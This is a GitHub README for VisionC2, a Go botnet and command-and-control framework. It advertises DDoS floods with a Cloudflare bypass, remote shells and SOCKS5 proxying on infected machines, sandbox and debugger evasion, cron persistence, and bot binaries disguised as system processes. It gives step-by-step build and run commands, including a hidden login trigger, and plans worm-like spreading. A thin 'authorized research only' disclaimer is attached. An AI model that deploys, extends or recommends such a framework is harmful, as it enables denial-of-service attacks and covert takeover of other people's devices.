Skip to content

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Command Execution, and Reverse SOCKS5

License

Notifications You must be signed in to change notification settings

Syn2Much/VisionC2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

193 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

☾℣☽ision - Advanced Go-Based C2 & Botnet

DDoS • SOCKS5 Proxying • Remote Shell • Multi-Architecture

Go Platform License

Animation


✨ Features

Bot Capabilities

  • Layer 4 Attacks — UDP, TCP, SYN, ACK, GRE, and DNS flood methods
  • Layer 7 Attacks — HTTP/HTTPS/TLS with HTTP/2 fingerprinting and Cloudflare UAM bypass
  • Remote ExecutionInteractive per-bot shell and fire-and-forget broadcast commands
  • SOCKS5 Proxy — Convert any agent into a high-performance SOCKS5 proxy server on demand

CNC & TUI Interface

  • Full-screen TUI (Terminal User Interface) for Command & Control
  • Real-time dashboard with bot management and live statistics
  • Visual attack builder with detailed metrics
  • Single-Agent Control — fully interactive per-bot shell interface
  • Broadcast Shell Execution — Powerful filters by architecture, RAM amount, bot count, and more
  • Built-in SOCKS5 Proxy Manager — One-click start/stop per bot or in bulk operations

Encryption & Stealth

  • TLS 1.3 with Perfect Forward Secrecy
  • HMAC challenge-response authentication system
  • Multi-layer obfuscation — RC4 → XOR → byte substitution → MD5
  • Anti-analysis & evasionSandbox detectionVM detectionDebugger detection

🚀 Quick Start

Prerequisites

sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen
# Go 1.23+ → https://go.dev/dl/

Installation

git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
chmod +x *
python3 setup.py
# CNC and Bot Binaries will be built during this proccess

⚙️ Configuration

Code changes are made automatically via an interactive setup

Review setup_config.txt after running to see current:

  • C2 address & ports
  • Magic code & encryption keys
  • Generated 4096-bit TLS certificates

Running the C2

Recommended (TUI Mode)

screen ./server
# Press Ctrl+A then D to detach from screen session
# Reattach with: screen -r

Telnet/Multi-User Mode (Legacy)

screen ./server --split
# Then connect with: nc <c2-ip> <admin-port>
# Type "spamtec" to trigger hidden login portal
# Uses users.json database for authentication

# Detach from screen: Ctrl+A then D
# Reattach: screen -r

COMMANDS.md | Complete CNC command reference

Bot binaries are automatically cross-compiled to bot/bins/.

🧬 Supported Architectures & Stealth Binaries

Binary Name Architecture Target Platforms
kworkerd0 x86 (386) Linux 32-bit
ethd0 x86_64 Linux 64-bit (most common)
mdsync1 ARMv7 Raspberry Pi 2/3, older ARM devices
ip6addrd ARM64 Raspberry Pi 4, modern Android, AWS Graviton
httpd MIPS Routers, IoT devices
... +12 more PPC64, RISC-V, s390x, loong64, etc.

All binaries are UPX-packed, stripped, and named to blend with legitimate system processes.

Architecture Overview

[ Admin ] → [ C2 Server/TUI ] ↔ [ Bot Agents ]
                    │              │
            TLS 1.3 │              ├─ Persistence (cron/rc.local)
            HMAC Auth │            ├─ Multi-layer C2 Resolution
                    │              ├─ Sandbox Detection
                    │              └─ Encrypted Command Loop
                    │
                    └─ Issues HMAC challenge
                       Verifies response
                       Queues commands

Authentication Flow

  1. Bot decrypts embedded C2 config (Base64 → XOR → RC4 → Byte Sub → MD5)
  2. Resolves C2 via DoH TXT / DNS A records
  3. TLS 1.3 handshake → HMAC challenge → MD5(ch + MAGIC + ch)
  4. Successful auth → encrypted command loop

📜 Documentation

File Description
USAGE.md Full setup, deployment, and TUI guide
COMMANDS.md Complete CNC command reference
CHANGELOG.md Version history and breaking changes

🛣️ Roadmap

In Progress

  • Finish TUI Updates
  • Enhanced daemonization
  • Competitor locker / killer module

Planned

  • Auto-generated DGA fallback domains
  • Self-replication & worm-like spreading
  • Single-instance port takeover

⚠️ Legal Disclaimer

FOR AUTHORIZED SECURITY RESEARCH AND STRESS TESTING ONLY

This software is provided strictly for educational, research, and authorized penetration testing purposes. The authors are not responsible for any misuse or legal consequences resulting from its use.

📜 License

GNU General Public License v3.0 — see LICENSE

Support

  • Open a GitHub Issue for bugs or feature requests
  • Detailed documentation in USAGE.md
  • Contact: dev@sinners.city

About

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Command Execution, and Reverse SOCKS5

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •